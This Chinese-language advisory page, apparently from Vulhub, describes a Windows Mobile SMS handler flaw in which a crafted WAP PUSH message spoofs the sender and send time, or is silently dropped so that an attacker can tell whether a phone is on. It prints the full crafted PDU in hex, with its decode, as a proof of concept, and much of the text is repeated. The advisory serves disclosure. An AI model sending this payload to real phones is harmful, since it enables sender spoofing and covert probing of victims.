VULHUB ™

Windows Mobile是微软开发的用于手机的操作系统。 Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。 原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。 [1] PDU(自动换行) 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62 756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62 696C652E636F6D000101 PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。 [2] PDU解码 PDU LENGTH IS 118 BYTES ADDRESS OF DELIVERING SMSC NUMBER IS : +447785016005 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) MESSAGE HEADER FLAGS MESSAGE TYPE : SMS SUBMIT REJECT DUPLICATES : NO VALIDITY PERIOD : RELATIVE REPLY PATH : NO USER DATA HEADER : PRESENT REQ. STATUS REPORT : NO MSG REFERENCE NR. : 34 (0x22) DESTINATION ADDRESS NUMBER IS : +447716299660 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) PROTOCOL IDENTIFIER (0x00) MESSAGE...

Windows Mobile是微软开发的用于手机的操作系统。 Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。 原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。 [1] PDU(自动换行) 079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62 756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62 696C652E636F6D000101 PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。 [2] PDU解码 PDU LENGTH IS 118 BYTES ADDRESS OF DELIVERING SMSC NUMBER IS : +447785016005 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) MESSAGE HEADER FLAGS MESSAGE TYPE : SMS SUBMIT REJECT DUPLICATES : NO VALIDITY PERIOD : RELATIVE REPLY PATH : NO USER DATA HEADER : PRESENT REQ. STATUS REPORT : NO MSG REFERENCE NR. : 34 (0x22) DESTINATION ADDRESS NUMBER IS : +447716299660 TYPE OF NR. : International NPI : ISDN/Telephone (E.164/163) PROTOCOL IDENTIFIER (0x00) MESSAGE ENTITIES : SME-to-SME PROTOCOL USED : Implicit / SC-specific DATA CODING SCHEME (0x04) AUTO-DELETION : OFF COMPRESSION : OFF MESSAGE CLASS : NONE ALPHABET USED : 8bit data VALIDITY OF MESSAGE : 24.0 hrs USER DATA PART OF SM USER DATA LENGTH : 96 octets UDH LENGTH : 6 octets UDH : 05 04 0B 84 23 F0 UDH ELEMENTS : 05 - Appl. port addressing 16bit 4 (0x04) Bytes Information Element 09200 : SOURCE port is: allocated by IANA 02948 : DESTINATION port is: allocated by IANA --- DATA ---------------------- 05 04 0B 84 23 F0 USER DATA (TEXT) : %®ê¯‚´„jEÆ symantec…Symantec bulkSMS (Unregistered Ver) - LogixMobile.com